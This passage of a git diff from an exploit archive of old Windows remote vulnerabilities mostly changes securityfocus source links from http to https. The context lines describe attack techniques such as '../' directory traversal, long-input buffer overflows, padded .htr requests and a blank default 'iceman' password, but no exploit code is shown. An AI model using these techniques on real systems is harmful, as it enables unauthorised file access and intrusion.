solution, incorporating mail, web, ftp, and proxy servers into one package. The web server will allow remote browsing of the entire filesystem by the usage of ../ strings in the URL. This gives an attacker read access to every file on the server's filesystem that the webserver has access to. diff --git a/exploits/windows/remote/19603.txt b/exploits/windows/remote/19603.txt index 0d45fda34..b6991e1a4 100644 --- a/exploits/windows/remote/19603.txt +++ b/exploits/windows/remote/19603.txt @@ -1,6 +1,6 @@ Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4,Internet Explorer 4.1 for Windows 95/Windows 98/Windows NT 4,Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4,Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0,Outlook 2000 0/98 0,Outlook Express 4.27.3110/4.72.2106/4.72.3120/4.72.3612 ActiveX CAB File Execution Vulnerability -source: http://www.securityfocus.com/bid/775/info +source: https://www.securityfocus.com/bid/775/info Introduction @@ -304,7 +304,7 @@ source: http://www.securityfocus.com/bid/775/info Links - http://www.securityfocus.com/bid/775/ - Active Setup control vulnerability details on securityfocus.com. + https://www.securityfocus.com/bid/775/ - Active Setup control vulnerability details on securityfocus.com. http://msdn.microsoft.com/library/periodic/period98/vbpj0798.htm - Documentation on the Active Setup control. http://www.microsoft.com/technet/security/bulletin/fq99-048.asp - Microsoft's security bulletin for the vulnerability. http://www.microsoft.com/msdownload/iebuild/ascontrol/en/ascontrol.htm - Microsoft's update for the control. diff --git a/exploits/windows/remote/19607.c b/exploits/windows/remote/19607.c index 45816394f..7f7152f7b 100644 --- a/exploits/windows/remote/19607.c +++ b/exploits/windows/remote/19607.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/779/info +// source: https://www.securityfocus.com/bid/779/info There is a overflowable buffer in the networking code for Windows 95 and 98 (all versions). The buffer is in the part of the code that handles filenames. By specifying an exceptionally long filename, an attacker can cause the machine to crash or execute arbitrary code. This vulnerability could be exploited remotely by including a hostile UNC or file:// URL in a web page or HTML email. The attack would occur when the page was loaded in a browser or the email was opened (including opening the email in a preview pane.) diff --git a/exploits/windows/remote/19608.c b/exploits/windows/remote/19608.c index deeee2144..6aa1ccf63 100644 --- a/exploits/windows/remote/19608.c +++ b/exploits/windows/remote/19608.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/779/info +// source: https://www.securityfocus.com/bid/779/info There is a overflowable buffer in the networking code for Windows 95 and 98 (all versions). The buffer is in the part of the code that handles filenames. By specifying an exceptionally long filename, an attacker can cause the machine to crash or execute arbitrary code. This vulnerability could be exploited remotely by including a hostile UNC or file:// URL in a web page or HTML email. The attack would occur when the page was loaded in a browser or the email was opened (including opening the email in a preview pane.) diff --git a/exploits/windows/remote/19611.txt b/exploits/windows/remote/19611.txt index 3c047208a..bbe4161f3 100644 --- a/exploits/windows/remote/19611.txt +++ b/exploits/windows/remote/19611.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/783/info +source: https://www.securityfocus.com/bid/783/info If an unusually long user name is passed to the Broker FTP server software, the program will crash. If the program is running as a service, the service will consume all available memory and crash the entire system. diff --git a/exploits/windows/remote/19612.pl b/exploits/windows/remote/19612.pl index 225d5c61a..13edcb1d1 100755 --- a/exploits/windows/remote/19612.pl +++ b/exploits/windows/remote/19612.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/787/info +source: https://www.securityfocus.com/bid/787/info There is a buffer overflow in the HELO command of the smtp gateway which ships as part of the VirusWall product. This buffer overflow could be used to launch arbitrary code on the vulnerable server. diff --git a/exploits/windows/remote/19614.asm b/exploits/windows/remote/19614.asm index dc19f8307..ffba90209 100644 --- a/exploits/windows/remote/19614.asm +++ b/exploits/windows/remote/19614.asm @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/787/info +source: https://www.securityfocus.com/bid/787/info There is a buffer overflow in the HELO command of the smtp gateway which ships as part of the VirusWall product. This buffer overflow could be used to launch arbitrary code on the vulnerable server. diff --git a/exploits/windows/remote/19617.txt b/exploits/windows/remote/19617.txt index ce479e65f..2aa5ea10f 100644 --- a/exploits/windows/remote/19617.txt +++ b/exploits/windows/remote/19617.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/790/info +source: https://www.securityfocus.com/bid/790/info The POP server that is part of the NetcPlus SmartServer3 email server has an unchecked buffer that could allow an attacker to execute code on the server. If the USER command is followed by an argument of over 800 characters, the input buffer will be overflowed, and data from the argument will be passed to the system to be executed at the privelege level of the SmartServer program. diff --git a/exploits/windows/remote/19618.txt b/exploits/windows/remote/19618.txt index 75adf5b03..7fdda4262 100644 --- a/exploits/windows/remote/19618.txt +++ b/exploits/windows/remote/19618.txt @@ -1,6 +1,6 @@ Microsoft Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4 Media Player ActiveX Error Message Vulnerability -source: http://www.securityfocus.com/bid/793/info +source: https://www.securityfocus.com/bid/793/info The Windows Media Player ActiveX control, shipped with IE 5, returns a specific error code if it is instructed to load a local file that does not exist. In this way, an attacker could determine whether or not a specified file on the victim's host exists. This could be used to determine user names and other facets of system configuration. diff --git a/exploits/windows/remote/19621.c b/exploits/windows/remote/19621.c index 5ff3d0b9b..c20bb17c9 100644 --- a/exploits/windows/remote/19621.c +++ b/exploits/windows/remote/19621.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/801/info +// source: https://www.securityfocus.com/bid/801/info Certain versions of EmailClub, a mail server package by Admiral Systems Inc. are vulnerable to a remote buffer overflow. This overflow is exploitable via EmailClub's POP3 server which fails to perform proper bounds checking on the 'From:' header on incoming e-mail. diff --git a/exploits/windows/remote/19622.c b/exploits/windows/remote/19622.c index 513f511f7..5f2b460b7 100644 --- a/exploits/windows/remote/19622.c +++ b/exploits/windows/remote/19622.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/802/info +// source: https://www.securityfocus.com/bid/802/info Certain versions of the W4-Server 32-bits personal webserver by Antelope Software ship with a flawed script, Cgitest.exe. This compiled CGI script fails to perform bounds checking on user supplied data and is vulnerable to a buffer overflow. diff --git a/exploits/windows/remote/19623.c b/exploits/windows/remote/19623.c index 9cd33e9c6..2950943af 100644 --- a/exploits/windows/remote/19623.c +++ b/exploits/windows/remote/19623.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/803/info +// source: https://www.securityfocus.com/bid/803/info Certain versions of WebBBS by Mike Bryeans of International TeleCommunications contain a flaw in the initial login program. User supplied data via the login name and password are not bounds checked and can result in a buffer overflow. This leads a compromise of the system running WebBBS. diff --git a/exploits/windows/remote/19637.txt b/exploits/windows/remote/19637.txt index 765f408e2..12b6b5935 100644 --- a/exploits/windows/remote/19637.txt +++ b/exploits/windows/remote/19637.txt @@ -1,6 +1,6 @@ MS IE 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4 XML HTTP Redirect Vulnerability -source: http://www.securityfocus.com/bid/815/info +source: https://www.securityfocus.com/bid/815/info A vulnerability in the method IE5 uses to process XML data may allow a malicious web site owner to read files on a visiting user's computer. A web page may be created that contains an XML object type that contains instructions to read known files on a visitor's local host (and or domain). The IE5 client will allow the XML redirect to access files within its own domain. diff --git a/exploits/windows/remote/19662.txt b/exploits/windows/remote/19662.txt index ad35e7868..c3fba2dfb 100644 --- a/exploits/windows/remote/19662.txt +++ b/exploits/windows/remote/19662.txt @@ -1,6 +1,6 @@ Internet Explorer 4.1 for Windows 95/Windows 98/Windows NT 4,Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4,Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0 Subframe Spoofing Vulnerability -source: http://www.securityfocus.com/bid/855/info +source: https://www.securityfocus.com/bid/855/info IE's default security settings allow a malicious webpage to open a new browser, open another site's main frame in that new browser and then set any subframes to a URL of their choosing. This could lead to misappropriation of private information, among other problems. diff --git a/exploits/windows/remote/19679.txt b/exploits/windows/remote/19679.txt index 92f1f195e..17f081b1c 100644 --- a/exploits/windows/remote/19679.txt +++ b/exploits/windows/remote/19679.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/874/info +source: https://www.securityfocus.com/bid/874/info Infoseek's Ultraseek enterprise search server listens on port 8765 by default for HTTP commands. The code that handles GET commands has an unchecked buffer that will allow arbitrary code to be executed if it is overflowed. diff --git a/exploits/windows/remote/19688.txt b/exploits/windows/remote/19688.txt index 3b24c6b0e..c2536728a 100644 --- a/exploits/windows/remote/19688.txt +++ b/exploits/windows/remote/19688.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/889/info +source: https://www.securityfocus.com/bid/889/info ZBSoft ZBServer Pro is an Internet and Intranet server that supports HTTP, Gopher, FTP and Chat Services. ZBServer is available for Microsoft Windows operating systems. diff --git a/exploits/windows/remote/19689.c b/exploits/windows/remote/19689.c index f6952984d..cc1a1a0d2 100644 --- a/exploits/windows/remote/19689.c +++ b/exploits/windows/remote/19689.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/889/info +// source: https://www.securityfocus.com/bid/889/info ZBSoft ZBServer Pro is an Internet and Intranet server that supports HTTP, Gopher, FTP and Chat Services. ZBServer is available for Microsoft Windows operating systems. diff --git a/exploits/windows/remote/19719.txt b/exploits/windows/remote/19719.txt index 535740777..926fbb3ae 100644 --- a/exploits/windows/remote/19719.txt +++ b/exploits/windows/remote/19719.txt @@ -1,6 +1,6 @@ Microsoft Internet Explorer 4.0 for Windows 3.1/Windows 95,Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4,Internet Explorer 5.5 preview,Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0,Internet Explorer 5.0.1 Security Zone Settings Lag Vulnerability -source: http://www.securityfocus.com/bid/923/info +source: https://www.securityfocus.com/bid/923/info When a new document is loaded into an IE window, IE will not update the Security Zone settings for that window until the new document is completely loaded. This means that if a local document is loaded, and then a large remote document is loaded that has JavaScript at the very beginning, the JavaScript may load and execute before the Security Zone settings are updated. This could lead to remote and untrusted JavaScript running as local trusted code, with full access to local files, cookies, etc. diff --git a/exploits/windows/remote/19724.txt b/exploits/windows/remote/19724.txt index 7184cc2fa..67efa31c1 100644 --- a/exploits/windows/remote/19724.txt +++ b/exploits/windows/remote/19724.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/929/info +source: https://www.securityfocus.com/bid/929/info ICQ is an individual to individual chat network which has clients installed on millions of computers around the world. It is, by far, the most widely used and is vulnerable to a remote buffer overflow. When the Mirabilis ICQ client parses an url recieved from another user _inside of a message_, it does not perform bounds checking on the length of the url. Because of this, it is possible to overwrite the EIP ("instruction pointer", or return address, that was pushed onto the stack when the offending function was first called) and execute arbitrary and possibly malicious code stuffed inside the oversized URL on the target host once the url is clicked on. diff --git a/exploits/windows/remote/19730.c b/exploits/windows/remote/19730.c index 3295d066a..d11aec311 100644 --- a/exploits/windows/remote/19730.c +++ b/exploits/windows/remote/19730.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/949/info +source: https://www.securityfocus.com/bid/949/info InetServ is a freeware mail server for 32 bit Windows systems. diff --git a/exploits/windows/remote/19731.c b/exploits/windows/remote/19731.c index e9c6da39e..573862907 100644 --- a/exploits/windows/remote/19731.c +++ b/exploits/windows/remote/19731.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/950/info +// source: https://www.securityfocus.com/bid/950/info Index Server 2.0 is a utility included in the NT 4.0 Option Pack. The functionality provided by Index Service has been built into Windows 2000 as Indexing Services. diff --git a/exploits/windows/remote/19734.java b/exploits/windows/remote/19734.java index ea2b3f453..a0fb7ec7d 100644 --- a/exploits/windows/remote/19734.java +++ b/exploits/windows/remote/19734.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/957/info +source: https://www.securityfocus.com/bid/957/info Microsoft's Java Virtual Machine will allow the reading of local file information by a remote Java application. This can be done two ways: diff --git a/exploits/windows/remote/19737.c b/exploits/windows/remote/19737.c index 8062cadbf..17d57992e 100644 --- a/exploits/windows/remote/19737.c +++ b/exploits/windows/remote/19737.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/961/info +// source: https://www.securityfocus.com/bid/961/info Tiny FTPd is a freeware FTP server for Win9x with a Japanese interface. Version .52 and possible previous versions have unchecked buffers in the code that handles the following commands: APPE, MKD, RMD, RNFR, RNTO, SIZE, STOR, XMKD, and XRMD. With these overflows, an attacker can overwrite the stack and execute arbitrary code. diff --git a/exploits/windows/remote/19738.txt b/exploits/windows/remote/19738.txt index b0df45acc..0f626a620 100644 --- a/exploits/windows/remote/19738.txt +++ b/exploits/windows/remote/19738.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/962/info +source: https://www.securityfocus.com/bid/962/info Microsoft Outlook Express 5, and possibly other email clients that parse HTML messages, can be made to run Active Scripting that will read any new messages that arrive after the hostile code has been run. diff --git a/exploits/windows/remote/19743.txt b/exploits/windows/remote/19743.txt index e34effd34..2a341f165 100644 --- a/exploits/windows/remote/19743.txt +++ b/exploits/windows/remote/19743.txt @@ -1,6 +1,6 @@ Cat Soft Serv-U 2.5/a/b,Windows 2000 Advanced Server/2000 Datacenter Server/2000 Professional/2000 Server/2000 Terminal Services/95/98/NT 4.0/NT Enterprise Server 4.0/NT Server 4.0/NT Terminal Server 4.0/NT Workstation 4.0 Shortcut Vulnerability -source: http://www.securityfocus.com/bid/970/info +source: https://www.securityfocus.com/bid/970/info The Windows API that handles shortcut navigation is susceptible to buffer overflow attacks. The API, "SHGetPathFromIDList" will parse a shortcut file (.lnk) to find the target file, directory or URL. A specifically malformed link will cause any program using the API to follow that shortcut to crash. diff --git a/exploits/windows/remote/19753.txt b/exploits/windows/remote/19753.txt index 1a48aaf6d..8c1fe7f51 100644 --- a/exploits/windows/remote/19753.txt +++ b/exploits/windows/remote/19753.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/989/info +source: https://www.securityfocus.com/bid/989/info Microsoft's Personal Web Server and Front Page Personal Web Server will follow '/..../' strings in requested URLs, allowing remote users to obtain unauthenticated read access to files and directories on the same logical drive as the web content. Hidden files are viewable via this method, although the Front Page directory itself is not. The name and path of the desired file must be known to the attacker. diff --git a/exploits/windows/remote/19761.txt b/exploits/windows/remote/19761.txt index 4487eda90..3568e7f98 100644 --- a/exploits/windows/remote/19761.txt +++ b/exploits/windows/remote/19761.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1002/info +source: https://www.securityfocus.com/bid/1002/info The Sambar Web/FTP/Proxy Server for Windows NT and 2000 supports DOS-style batch programs as CGI scripts. A remote attacker can use any batch file used by the server in the 'cgi-bin' directory to run any valid command-line program with administrator privileges. This allows the attacker to read, modify, create, or delete any file or directory on the system, including user accounts, etc. Even if the user hasn't enabled or created any batch files, the software ships with two by default: 'hello.bat' and 'echo.bat'. diff --git a/exploits/windows/remote/19805.txt b/exploits/windows/remote/19805.txt index 4323b8bc1..93aa9dcc2 100644 --- a/exploits/windows/remote/19805.txt +++ b/exploits/windows/remote/19805.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1049/info +source: https://www.securityfocus.com/bid/1049/info By default, Real Server includes the IP address of the server in data sent to the client. If the Real Server is installed on a machine in a NAT environment, (where requests from the outside network are handled by reverse proxy), this will reveal what are supposed to be private, hidden IP addresses. diff --git a/exploits/windows/remote/19809.txt b/exploits/windows/remote/19809.txt index bed817b4a..223c000c5 100644 --- a/exploits/windows/remote/19809.txt +++ b/exploits/windows/remote/19809.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1053/info +source: https://www.securityfocus.com/bid/1053/info Oracle Web Listener for NT makes use of various batch files as cgi scripts, which are stored in the /ows-bin/ directory by default. diff --git a/exploits/windows/remote/19815.txt b/exploits/windows/remote/19815.txt index c5107e608..7cde7e7ce 100644 --- a/exploits/windows/remote/19815.txt +++ b/exploits/windows/remote/19815.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1067/info +source: https://www.securityfocus.com/bid/1067/info Some versions of vqSoft vqServer for Windows are vulnerable to the common ../../ method of retrieving known files from outside of the web directory structure, accomplished by appending a variable number of "../" and a known filename to an HTTP GET request. diff --git a/exploits/windows/remote/19819.txt b/exploits/windows/remote/19819.txt index 891c512f7..4670ae340 100644 --- a/exploits/windows/remote/19819.txt +++ b/exploits/windows/remote/19819.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1073/info +source: https://www.securityfocus.com/bid/1073/info WindMail is a command-line mailer that can be integrated with perl cgi applications to create form-mail capability for a website. diff --git a/exploits/windows/remote/19830.txt b/exploits/windows/remote/19830.txt index a6923cd80..0e5e6d011 100644 --- a/exploits/windows/remote/19830.txt +++ b/exploits/windows/remote/19830.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1084/info +source: https://www.securityfocus.com/bid/1084/info Index Server can be used to cause IIS to display the source of .asp and possibly other server-side processed files. diff --git a/exploits/windows/remote/19845.pl b/exploits/windows/remote/19845.pl index 4cebf6ac2..cf8bddf57 100755 --- a/exploits/windows/remote/19845.pl +++ b/exploits/windows/remote/19845.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1108/info +source: https://www.securityfocus.com/bid/1108/info Two dlls (dvwssr.dll and mtd2lv.dll) included with the FrontPage 98 extensions for IIS and shipped as part of the NT Option Pack include an obfuscation string that manipulates the name of requested files. Knowing this string and the obfuscation algorithm allows anyone with web authoring privileges on the target host to download any .asp or .asa source on the system (including files outside the web root, through usage of the '../' string). This includes users with web authoring rights to only one of several virtual hosts on a system, allowing one company to potentially gain access to the source of another company's website if hosted on the same physical machine. diff --git a/exploits/windows/remote/19846.pl b/exploits/windows/remote/19846.pl index 3504e9b97..22a5ba43f 100755 --- a/exploits/windows/remote/19846.pl +++ b/exploits/windows/remote/19846.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1109/info +source: https://www.securityfocus.com/bid/1109/info The dvwssr.dll included with the FrontPage 98 extensions for IIS and shipped as part of the NT Option Pack has a remotely exploitable buffer overflow. This attack will result in the service no longer accepting connections and may allow for remote code execution on the vulnerable host. diff --git a/exploits/windows/remote/19871.txt b/exploits/windows/remote/19871.txt index c7cc7235e..9a524427f 100644 --- a/exploits/windows/remote/19871.txt +++ b/exploits/windows/remote/19871.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1137/info +source: https://www.securityfocus.com/bid/1137/info Certain versions of Zone Labs personal Firewall have a vulnerability which allows malicious users to port scan the firewall without being detected. In particular if the port scan originates from source port 67 on the attacking host the ZoneAlarm fails to register the attack. diff --git a/exploits/windows/remote/19877.txt b/exploits/windows/remote/19877.txt index 16704801a..19cfe9024 100644 --- a/exploits/windows/remote/19877.txt +++ b/exploits/windows/remote/19877.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1141/info +source: https://www.securityfocus.com/bid/1141/info htimage.exe can be used to determine if a specified path and filename exists on the target host or not. The specified path must be on the same logical drive as the web content. diff --git a/exploits/windows/remote/19881.txt b/exploits/windows/remote/19881.txt index 5d4ac0d3b..aac727dcd 100644 --- a/exploits/windows/remote/19881.txt +++ b/exploits/windows/remote/19881.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1153/info +source: https://www.securityfocus.com/bid/1153/info Within cart32.exe, entering any password by way of http://target/scripts/cart32.exe/cart32clientlist, a remote user could obtain vital client information such as username, password, credit card numbers, and other crucial details. Passwords will appear encrypted, however they can be used in conjunction with specific URL requests which can be used to execute arbitrary commands. diff --git a/exploits/windows/remote/19889.c b/exploits/windows/remote/19889.c index d22b5d64e..425a62c3b 100644 --- a/exploits/windows/remote/19889.c +++ b/exploits/windows/remote/19889.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1163/info +// source: https://www.securityfocus.com/bid/1163/info Unpredictable results, including system crashes, lock-ups, reboots, and loss of network connectivity, can occur in Windows 95/98 if a NetBIOS session packet is received with the source host name set to NULL. diff --git a/exploits/windows/remote/19893.c b/exploits/windows/remote/19893.c index c6aa02fb0..d91463d8d 100644 --- a/exploits/windows/remote/19893.c +++ b/exploits/windows/remote/19893.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1167/info +// source: https://www.securityfocus.com/bid/1167/info The Web Archive component of L-Soft Listserv contains unchecked buffer code exploitable by sending specially crafted requests to the Web Archive. This weakness will allow execution of arbitrary code by remote attackers. diff --git a/exploits/windows/remote/19895.txt b/exploits/windows/remote/19895.txt index 0346f69d5..4564d54bb 100644 --- a/exploits/windows/remote/19895.txt +++ b/exploits/windows/remote/19895.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1172/info +source: https://www.securityfocus.com/bid/1172/info DNews News Server is a CGI application that gives access to auser's NNTP server over the web. There are many unchecked buffers in the program, some of which can be exploited directly from any browser. Supplying an overlylong value for the "group", "cmd" and "utag" variables, and possibly others, will overwrite their respective buffers. In this manner, arbitrary code can be executed on the remote target. diff --git a/exploits/windows/remote/19897.txt b/exploits/windows/remote/19897.txt index 59046aa17..a49bf5995 100644 --- a/exploits/windows/remote/19897.txt +++ b/exploits/windows/remote/19897.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1174/info +source: https://www.securityfocus.com/bid/1174/info The local path of a HTML, HTM, ASP, or SHTML file can be disclosed in Microsoft IIS 4.0/5.0 / Frontpage Server Extensions 1.1 and prior. Passing a path to a non-existent file to the shtml.exe or shtml.dll (depending on platform) program will display an error message stating that the file cannot be found accompanied by the full local path to the web root. For example, performing a request for http://target/_vti_bin/shtml.dll/non_existant_file.html will produce an error message stating "Cannot open "C:\localpath\non_existant_file.html": no such file or folder" diff --git a/exploits/windows/remote/19908.txt b/exploits/windows/remote/19908.txt index 332a10bce..906b64c4d 100644 --- a/exploits/windows/remote/19908.txt +++ b/exploits/windows/remote/19908.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1193/info +source: https://www.securityfocus.com/bid/1193/info Requesting a known filename with the extension replaced with .htr preceeded by approximately 230 "%20" (which is an escaped character that represents a space) from Microsoft IIS 4.0/5.0 will cause the server to retrieve the file and its contents. This is due to the .htr file extension being mapped to ISM.DLL ISAPI application which redirects .htr file requests to ISM.DLL. ISM.DLL removes the extraneous "%20" and replaces .htr with the proper filename extension and reveals the source of the file. This vulnerability is similar to a more recently discovered variant, BugTraq ID 1488. diff --git a/exploits/windows/remote/19914.txt b/exploits/windows/remote/19914.txt index 760f7d348..d5f8b0c42 100644 --- a/exploits/windows/remote/19914.txt +++ b/exploits/windows/remote/19914.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1203/info +source: https://www.securityfocus.com/bid/1203/info Emurl software creates a unique identifier for each user, based on their account name. This identifier is encoded using the ascii value of each character in the account name and augmented by its position. By using a specific URL along with a user's identifier, it is possible to retreive that users e-mail as well as view and change their account settings. diff --git a/exploits/windows/remote/19922.pl b/exploits/windows/remote/19922.pl index cdafa70e6..691d03855 100755 --- a/exploits/windows/remote/19922.pl +++ b/exploits/windows/remote/19922.pl @@ -1,11 +1,11 @@ -source: http://www.securityfocus.com/bid/1216/info +source: https://www.securityfocus.com/bid/1216/info ICECap Manager is a management console for BlackICE IDS Agents and Sentries. By default, ICECap Manager listens on port 8081, transmits alert messages to another server on port 8082, and has an administrative username of 'iceman' possessing a blank password. A remote user could login to ICECap manager through port 8081 (using the default username and password if it hasn't been modified) and send out false alerts. In addition, the evaluation version of ICECap Manager has the option of utilizing Microsoft Access' JET Engine 3.5. This creates a security hazard because JET Engine 3.5 is vulnerable to remote execution of Visual Basic for Application code. Therefore, remote users may execute arbitrary commands on ICECap Manager through the use of the default username and password and JET Engine 3.5. More information can be found regarding the JET Database Engine 3.5 vulnerability at the following URL: -http://www.securityfocus.com/bid/286 +https://www.securityfocus.com/bid/286 Please note that ICECap Manager is no longer maintained by Network Ice but by Internet Security Systems. diff --git a/exploits/windows/remote/19928.txt b/exploits/windows/remote/19928.txt index e17ea2a7e..4c1bfe6e7 100644 --- a/exploits/windows/remote/19928.txt +++ b/exploits/windows/remote/19928.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1221/info +source: https://www.securityfocus.com/bid/1221/info The Microsoft Active Movie Control (a multimedia ActiveX control) will download files of any type specified in the control parameters in an HTML document, regardless of whether or not they are a valid media type. A hostile website, HTML email or HTML newsgroup post could therefore write executables and other potentially harmful content to target machines, which will be stored with their known filenames in the default Windows Temp directory. diff --git a/exploits/windows/remote/19939.html b/exploits/windows/remote/19939.html index 82eae262b..f8b54f70f 100644 --- a/exploits/windows/remote/19939.html +++ b/exploits/windows/remote/19939.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1224/info +source: https://www.securityfocus.com/bid/1224/info The DocumentComplete() function in IE does not properly validate origin domains. diff --git a/exploits/windows/remote/19942.txt b/exploits/windows/remote/19942.txt index ae3dbee5d..b8bd5350e 100644 --- a/exploits/windows/remote/19942.txt +++ b/exploits/windows/remote/19942.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1226/info +source: https://www.securityfocus.com/bid/1226/info By default, Fortech Proxy+ can be remotely administered by any user possessing no authorization simply by connecting to http://target:4400/admin. diff --git a/exploits/windows/remote/19957.txt b/exploits/windows/remote/19957.txt index d48250872..fa164fcf7 100644 --- a/exploits/windows/remote/19957.txt +++ b/exploits/windows/remote/19957.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1245/info +source: https://www.securityfocus.com/bid/1245/info A remote user can gain read and write access on a target machine running Carello shopping cart software. diff --git a/exploits/windows/remote/19973.txt b/exploits/windows/remote/19973.txt index 87a454963..a42a0c00a 100644 --- a/exploits/windows/remote/19973.txt +++ b/exploits/windows/remote/19973.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1278/info +source: https://www.securityfocus.com/bid/1278/info A remote user may browse any known directory on a host running Fastraq Mailtraq 1.1.4 by making a URL request that includes the '../' string. diff --git a/exploits/windows/remote/19975.pl b/exploits/windows/remote/19975.pl index f2a55db68..5b05d4362 100755 --- a/exploits/windows/remote/19975.pl +++ b/exploits/windows/remote/19975.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1284/info +source: https://www.securityfocus.com/bid/1284/info Apache HTTP Server 1.3.x (win32) allows people to get a directory listing of a directory, if it is enabled in the config, even if an index file is present that would normally be displayed instead. This can be achieved by sending a number of "/" characters appended to an HTTP request to the server. (eg: http://www.host.com///////////////////////////////////////////////////////...) When apache calls stat() to check if the index.html (for example) exists, Windows will return an error if the path is too long. Apache incorrectly treats this as if the file does not exist. Different numbers of "/"s are required based on the length of the path to the DocumentRoot. diff --git a/exploits/windows/remote/19976.txt b/exploits/windows/remote/19976.txt index 0caba324d..78b24213c 100644 --- a/exploits/windows/remote/19976.txt +++ b/exploits/windows/remote/19976.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1286/info +source: https://www.securityfocus.com/bid/1286/info Sending an email to a Concatus IMate Web Mail Server 2.5 with a server name consisting of over 1119 characters will cause the application to crash. Restarting the program is required in order to regain normal functionality. diff --git a/exploits/windows/remote/19997.java b/exploits/windows/remote/19997.java index ea487d136..d02010a32 100644 --- a/exploits/windows/remote/19997.java +++ b/exploits/windows/remote/19997.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1315/info +source: https://www.securityfocus.com/bid/1315/info EType EServ is a combination mail, news, HTTP, FTP, and proxy server. diff --git a/exploits/windows/remote/20019.txt b/exploits/windows/remote/20019.txt index 7539fe970..88b80c3c3 100644 --- a/exploits/windows/remote/20019.txt +++ b/exploits/windows/remote/20019.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1358/info +source: https://www.securityfocus.com/bid/1358/info By appending the string "/expdate" to a request for the cart32.exe executable, (http: //target/cgi-bin/cart32.exe/expdate) an attacker can access an error message followed by a debugging page containing the server variables, the Cart32 administration directory and possibly the contents of the cgi-bin. diff --git a/exploits/windows/remote/20040.c b/exploits/windows/remote/20040.c index 4d938ebce..de2a1d01c 100644 --- a/exploits/windows/remote/20040.c +++ b/exploits/windows/remote/20040.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1400/info +// source: https://www.securityfocus.com/bid/1400/info Multiple unchecked buffers exist in the POP3 and HTTP Proxy components of SapporoWorks WinProxy which could open up the possibilities of denial of service attacks or remote execution of arbitrary code. diff --git a/exploits/windows/remote/20048.txt b/exploits/windows/remote/20048.txt index fc5cf4636..131d9bec5 100644 --- a/exploits/windows/remote/20048.txt +++ b/exploits/windows/remote/20048.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1415/info +source: https://www.securityfocus.com/bid/1415/info Sending a stream of binary zeros to any one of a number of Windows 2000 ports can cause 100% CPU utilization. The ports that were found vulnerable include TCP ports 7, 9, 21, 23, 7778 and UDP ports 53, 67, 68, 135, 137, 500, 1812, 1813, 2535, 3456. diff --git a/exploits/windows/remote/20065.txt b/exploits/windows/remote/20065.txt index 5a121579e..ac677a949 100644 --- a/exploits/windows/remote/20065.txt +++ b/exploits/windows/remote/20065.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1452/info +source: https://www.securityfocus.com/bid/1452/info Guild Ftpd will not send files outside of the ftp root when they are specified by the ../ string in the path of the GET request. However due to the difference in the error messages it is able to determine if the file requested exists. The error message "Download failed" appears if the requested file exists and "Access denied" if it does not. diff --git a/exploits/windows/remote/20066.java b/exploits/windows/remote/20066.java index a6eadf4df..a319a5739 100644 --- a/exploits/windows/remote/20066.java +++ b/exploits/windows/remote/20066.java 